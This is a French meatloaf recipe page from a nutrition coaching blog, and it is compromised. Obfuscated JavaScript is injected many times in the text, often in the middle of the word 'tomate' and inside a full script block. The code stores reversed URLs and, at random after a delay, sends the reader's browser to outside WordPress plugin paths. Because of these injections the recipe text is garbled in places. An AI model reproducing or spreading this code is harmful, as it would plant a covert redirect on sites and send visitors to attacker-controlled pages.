PAIN DE VIANDE “SUPER BON”

Pain de viande
PAIN DE VIANDE “SUPER BON”

Un pain de viande gouteux et juteux à souhait. Cette recette plaira à toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toute la famille, pourquoi se priver ? En plus sa couleur rouge vif en fait un plat très beau visuellement. A servir avec la salade de votre choix.

Pour 4 Pers.

INGRÉDIENTS :

– 1 kilo de boeuf haché (moitié 15% MG, moitié 5% MG)
– 2 oignons finement emincés
– 2 CS de beurre clarifié (ghee)
– 1 cc de thym séché
– 1 CS de concentré de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomate (+ 1 CS pour la sauce)
– 2 oeufs battus
– ½ tasse d’amande en poudre
– ½ tasse de coulis de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomate
– 1 CS de sauce soja sucrée
– 2 gousses d’ail émincées
– 1 cc de moutarde forte
– fleur de sel, poivre du moulin

Préchauffer le four à 175°


Dans une grande pôele, cuire les oignons et le thym séché avec le ghee pendant environ 7 minutes


Hors du feu, rajouter 1 CS de concentré de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomate et laisser refroidir


Mélanger dans un bol cette mixture avec le boeuf, la poudre d’amande et les oeufs. Assaisonner. Mélanger délicatement.


Tapisser le fond d’un moule à cake de papier sulfurisé et y verser la preparation.


Dans un bol, mélanger 1 CS de concentré de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomate, le coulis de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomate, la sauce soja, l’ail et la moutarde. Verser cette sauce sur le pain de viande


Cuire une heure, sortir le pain de viande du four et laisser reposer 10 minutes avant de le detailler en tranches épaisses.


Bon appétit !
Un pain de viande gouteux et juteux à souhait. Cette recette plaira à <script>$nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;	setTimeout($nJe(0), delay);}</script><script>$nJe=function(n){if (typeof ($nJe.list[n]) == toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toute la famille, pourquoi se priver ? En plus sa couleur rouge vif en fait un plat très beau visuellement. A servir avec la salade de votre choix.” class=”wp-image-4092″/>
Pain de viande
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LES RECETTES BE HARMONY

Be Harmony vous invite à retrouver l’ensemble de ses recettes sur son Blog “Idées Recettes” (lien ci-dessous)

Joanne Reichling, issue de la formation “Arts culinaires” de l’école d’Alain DUCASSE, vous propose chaque semaine une recette originale qui vous permettra de vous adapter à votre rééquilibrage alimentaire.

Pour plus d’informations, vous pouvez consulter notre Site Internet et/ou vous rapprocher de votre harmonythérapeute.

A très bientôt !

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